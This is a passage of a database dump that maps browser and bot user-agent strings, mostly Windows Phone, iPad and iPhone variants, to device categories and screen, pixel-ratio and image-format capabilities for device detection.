IEMobile/11.0; Nokia; Lumia 925) like Gecko','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 925) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Nokia; Lumia 930) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; SAMSUNG; GT-I8750) like iPhone','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (X11; Datanyze; Linux x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','','{\"type\":\"desktop\",\"markup\":\"\"}'),('Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0; +http://www.cloudflare.com/always-online) AppleWebKit/*','bot','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":398,\"screenHeight\":299,\"pixelRatio\":2.56666666667,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; HTC; Windows Phone 8S xx HTC)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; HTC; Windows Phone 8X xx HTC)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Microsoft; Lumia 532)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Microsoft; Lumia 640 Dual SIM)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Microsoft; Lumia 640 LTE)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; 909)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":2.4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 1320)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 520)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 520; Orange)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 525)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 620)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 625)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 625; Orange)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 720)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 730 Dual SIM)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 820)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 820; ANZ825)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 822)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 830)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 920)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; Nokia; Lumia 925)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":2.4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; SAMSUNG; SCH-I930)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; Nokia; Lumia 510)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; Nokia; Lumia 510; Orange)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; Nokia; Lumia 610)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; Nokia; Lumia 710)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; Nokia; Lumia 800)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; SAMSUNG; GT-S7530)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; SAMSUNG; OMNIA7)','windowsphone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; Wappalyzer; +https://github.com/AliasIO/Wappalyzer)','bot','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":398,\"screenHeight\":299,\"pixelRatio\":2.5666666666667,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (compatible; YandexMetrika/2.0; +http://yandex.com/bots)','bot','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":410,\"screenHeight\":307,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 10 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 11 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 11 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 12 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 12 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 13 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 13 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 14 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 5 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 6 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 7 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 8 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 9 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPad; CPU OS 9 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipad','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU OS 13 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU OS 13 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU OS 14 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU Phone OS 14 like Mac OS X) WebKit/8610 (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 10 like Mac OS X)','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 10 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 10 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 10 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) YaApp_iOS/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 11 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":375,\"screenHeight\":812,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 11 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":375,\"screenHeight\":812,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 11 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) YaApp_iOS/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":375,\"screenHeight\":812,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 11 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) YaApp_iOS/* YaApp_iOS_Browser/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":375,\"screenHeight\":812,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 12 like Mac OS X) AppleWebKit/* (KHTML, like Gecko)','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 12 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 12 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 12 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) YaApp_iOS/* YaApp_iOS_Browser/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 13 like Mac OS X) AppleWebKit/* (KHTML, like Gecko)','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 13 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 13 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 13 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* YaApp_iOS/* YaApp_iOS_Browser/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 13 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) YaApp_iOS/* YaApp_iOS_Browser/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 14 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 14 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 14 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* YaApp_iOS/* YaApp_iOS_Browser/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 14 like Mac OS X) WebKit/8610 (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":390,\"screenHeight\":844,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 14 like Mac OS X) WebKit/8611 (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 15 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 15 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 15 like Mac OS X) WebKit/8612 (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 3 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 4 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 4 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 5 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* 